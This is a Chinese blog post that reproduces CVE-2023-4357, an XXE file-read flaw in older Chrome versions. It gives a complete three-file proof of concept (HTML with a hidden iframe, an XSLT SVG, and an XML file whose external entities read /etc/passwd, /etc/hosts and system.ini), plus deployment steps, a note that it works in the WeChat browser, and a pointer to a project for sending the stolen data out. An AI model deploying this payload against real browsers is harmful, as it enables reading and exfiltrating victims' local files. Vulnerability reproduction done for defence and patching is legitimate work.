谷歌浏览器任意文件访问漏洞(CVE-2023-4357)复现

最新推荐文章于 2024-04-26 20:05:58 发布
最新推荐文章于 2024-04-26 20:05:58 发布
阅读量1k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 安全 漏洞复现 网络安全 谷歌浏览器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiayu729100940/article/details/134515672
版权

1.漏洞级别

高危

2.漏洞描述

该漏洞的存在是由于 Google Chrome中未充分验证 XML 中不受信任的输入。远程攻击者可利用该漏洞通过构建的 HTML 页面绕过文件访问限制,导致chrome任意文件读取。
总结:一个XXE漏洞

3.利用范围

Google Chrome < 116.0.5845.96
所有使用谷歌内核的浏览器都能触发该漏洞 因此这个漏洞的利用范围其实非常广泛
在复现的时候 对微信浏览器的复现依然可以成功

4.漏洞复现

4.1 漏洞代码

我们需要创建三个文件
c.html


<body>
  <div id="r"></div>
  <script>
    const ifr = document.createElement('iframe');
    ifr.style.display = 'none';
    document.body.appendChild(ifr);
    ifr.onload = function() {
      const ifrContent = ifr.contentWindow.document.documentElement.innerHTML;
      r.innerHTML = `current url:<br />${location.href}<br /><br />get data:<br />${ifrContent}`;
    }
    ifr.src = "./c2.svg";

    var data = `current url:<br />${location.href}<br /><br />get data:<br />${ifrContent}`;
    alert(data);
</script>
</body>

c2.svg


<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="?#"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <svg width="1000%" height="1000%" version="1.1" xmlns="http://www.w3.org/2000/svg">
      <foreignObject class="node" font-size="18" width="100%" height="100%">
        <body xmlns="http://www.w3.org/1999/xhtml">
          <xmp>
            <xsl:copy-of select="document('./c3.xml')"/>
          </xmp>
        </body>
      </foreignObject>
    </svg>
  </xsl:template>
</xsl:stylesheet>

c3.xml


<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xml" href="?#"?>
<!DOCTYPE p [
  <!ENTITY passwd SYSTEM "file:///etc/passwd">
  <!ENTITY hosts SYSTEM "file:///etc/hosts">
  <!ENTITY group SYSTEM "file://localhost/etc/group">
  <!ENTITY sysini SYSTEM "file:///c:/windows/system.ini">
]>
<p>
  <p style="border-style: dotted;">/etc/passwd:
  &passwd;
  </p>
  <p style="border-style: dotted;" id="hosts">/etc/hosts:
  &hosts;
  </p>
  <p style="border-style: dotted;">/etc/group:
  &group;
  </p>
  <p style="border-style: dotted;">c:/windows/system.ini:
  &sysini;
  </p>
</p>

注:

xml文件是我们控制输出内容的,写法可以直接参考xml引用外部主体的方法,这里需要注意的是必须要写绝对路径

创建好这3个文件后,上传到服务器部署,没有web环境的童鞋可以通过python快速拉起一个

python3 http.server 8080   #python3

简单复现,在微信电脑端直接搜索生成的网页链接,
在这里插入图片描述点击访问,如果处于漏洞内核版本下就会成功触发
在这里插入图片描述

4.2 漏洞利用进阶

这里的敏感数据显示都是存在于网页上,但是我们依然可以通过html的机制把这些敏感数据外发到指定服务器上

可以参考这个项目

https://github.com/idootop/all-seeing-eye/tree/main

后续有时间我就写一个简易的实现代码,如果想直接测试 可以用上面的项目

fly夏天
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Citrix ADC(NSVPX-HyperV-13.0-47.24-)
07-28
虚拟机和实体机,还有系统对应的版本可能存在不同,请点击我的头像,下载对应的版本,不要下载错了,浪费积分,谢谢!
TPCTF2023 Web方向 个人题解Wp
Jay17的博客
11-27 605
TPCTF2023 Web方向 个人题解Wp
Google Chrome 任意文件读取 (CVE-2023-4357)漏洞复现
huangyongkang666的博客
11-18 3364
Google Chrome 任意文件读取漏洞(CVE-2023-4357)
CVE-2023-4357】Chrome-XXE 任意文件读取漏洞复现及原理解析
新青年1号
11-20 1638
使用默认的沙盒,攻击者可以在 ios(safari/chrome),mac(safari/chrome),android(chrome)和 samsung tv(默认浏览器) 上读取 /etc/hosts 文件,当使用 -no-sandbox 属性时,攻击者可以读取操作系统上的任意文件。关系类似于 JSP 和 Java 的关系(不太准确,但比较容易理解),XLS 实际上就是在 XML 的基础上增加了一些扩展的语法,从而可以将 XML 中的数据转换为 HTML 呈现。这里写成 XML 格式也是完全可以的。
Splunk Enterprise远程代码执行漏洞(CVE-2022-43571)安全风险通告
smellycat000的专栏
12-22 1616
奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。安全通告Splunk Enterprise是机器数据的引擎。使用Splunk可收集、索引和利用所有应用程序、服务器和设备生成的快速移动型计算机数据。关联并分析跨越多个系统的复杂事件。获取新层次的运营可见性以及IT和业务智能。近日,奇安信CERT监测到Splunk Enterprise中存在远程代码执行漏洞(CVE-2022-4...
Google Chrome 任意文件读取 (CVE-2023-4357)漏洞
weixin_62693307的博客
11-20 1002
中用户提供的 XML 输入验证不足。远程攻击者可以创建特制网页,诱骗受害者访问该网页并获取用户系统上的敏感信息。远程攻击者可利用该漏洞通过构建的 HTML 页面绕过文件访问限制,导致chrome任意文件读取。Libxslt 是在基于 WebKit 的浏览器(如 chrome,safari 等)中默认使用的 XSL 库。Libxslt 允许 XSL document() 方法加载的文档内部存在外部实体。攻击者可以绕过安全限制,从 http(s):// 网址访问 file:// 网址并获取文件访问权限。
CVE漏洞复现-CVE-2023-38831 WinRAR代码执行漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
10-27 798
WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在 Windows环境下的图形界面。该软件可用于备份数据,缩减电子邮件附件的大小,解压缩从 Internet 上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。从5.60版开始,WinRAR启用了新的图标,但用户仍可以通过官网提供的主题包换回原版风格的图标。
CVE-2023-50164 Apache Struts2漏洞复现
黑剑
12-15 2708
从本质上讲,该漏洞允许攻击者利用 Apache Struts 文件上传系统中的缺陷。它允许他们操纵文件上传参数并执行路径遍历。这种利用可能会导致在服务器上执行任意代码,从而导致各种后果,例如未经授权的数据访问、系统受损,甚至完全控制受影响的系统,包括在系统中放置恶意文件。仔细一看,CVE-2023-50164涉及Apache Struts的文件上传机制中的一个漏洞。对于非技术受众,想象一下这样一个场景:安全检查点(文件上传机制)由于漏洞而被绕过,从而允许未经授权的访问安全区域(服务器)。
关于谷歌浏览器 最新版本 chromedriver122.0.6261.94(正式版本)找不到最新版本浏览器驱动解决方法 chromedriver120/121/122 版本 122.0最新版已更新
热门推荐
weixin_43807047的博客
08-21 1万+
关于谷歌浏览器最新版本 116.0.5845.97(正式版本)找不到最新版本浏览器驱动解决方法
在野完整Chrome浏览器漏洞利用攻击链分析
xnxqwzy的博客
08-10 158
目前包括天眼高级威胁检测产品在内的天擎终端安全管理系统、NGSOC、TIP威胁情报平台、智慧防火墙等全线奇安信攻击检测类产品都已经支持对此威胁的检测,用户可以升级相关的设备到最新的版本和规则库。
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
全视通智慧手术室对讲方案,让手术更安全更高效
2301_78035670的博客
04-24 452
全视通智慧手术室对讲方案通过整合等候区公告屏、医护主机、手术间门口机、复苏室主机等多个模块和设备,专用于手术室、护士站、谈话间、复苏室、器械室和其他协同部门,实现了对手术流程的全面管理和监控。
安装SSL证书之后还会有不安全提示怎么办?
JoySSL230907的博客
04-20 824
在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。- 证书链完整性:确保您不仅安装了主证书,还包含了所有必要的中间证书。缺少中间证书可能导致浏览器认为证书不可信。- 清除浏览器缓存:浏览器可能缓存了旧的或错误的证书信息,清除缓存有助于加载新安装的证书。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。
跨境电商测评攻略:如何安全有效地提升业绩?
zcwz888的博客
04-23 343
但自养号需要解决技术层面的问题,如果是买设备或者软件这种,可能上一秒还能用,下一秒就因为平台风控的原因批量封号,因为平台会通过ip 获取到设备的型号,地区码,监管码,主板码,WIFI地址,甚至是颜色,指纹码,IP地址等等大概几十个参数,参数关联后,触发平台机审,导致的砍单,封号。这时候要好好规划一下测评的事情,做美客多到最后你会发现,测评是最有效果的,因为测评的本质就是玩弄流量,模仿用户的真实行为让流量变得更多,从而得到跨境电商平台规则的加成,竞争激烈的产品不测评和别人竞争。
网络安全实训Day16
最新发布
Yisitelz的博客
04-26 289
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
mysql安全漏洞CVE-2023-0215
07-29
很抱歉,但我无法回答关于"mysql安全漏洞CVE-2023-0215"的问题。因为在您提供的引用内容中,并没有提到与该漏洞相关的信息。如果您有其他关于该漏洞的引用内容或更多的背景信息,我将很乐意为您提供帮助。 #### 引用[.reference_title] - *1* *3* [CVE-2023-21839漏洞本地简单复现](https://blog.csdn.net/csdnmmd/article/details/129247272)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CVE-2023-0215](https://blog.csdn.net/qq_39933800/article/details/131203431)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值